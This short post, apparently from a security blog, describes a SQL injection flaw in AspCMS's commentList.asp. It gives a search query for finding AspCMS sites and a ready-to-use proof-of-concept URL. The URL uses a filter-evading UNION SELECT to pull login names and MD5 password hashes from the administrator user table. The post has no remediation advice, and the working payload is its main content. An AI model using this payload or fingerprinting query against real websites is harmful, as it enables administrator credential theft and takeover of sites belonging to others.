Aspcms Commentlist Asp Sql Injection Vulnerability
Aspcms Commentlist Asp Sql Injection Vulnerability
AspCMS commentList.asp SQL injection vulnerability
Vulnerability Description
AspCMS commentList.asp has a SQL injection vulnerability, and an attacker can obtain the administrator md5 password through the vulnerability.
Vulnerability Impact
AspCMS
Network surveying and mapping
app=”ASPCMS”
Vulnerability reappears
CMS is judged through the website source code response
Verify POC
1
/plug/comment/commentList.asp?id=-1%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now(),null,1%20%20frmasterom%20{prefix}user
MD5 successfully obtained the administrator account and password
This post is licensed under CC BY 4.0 by the author.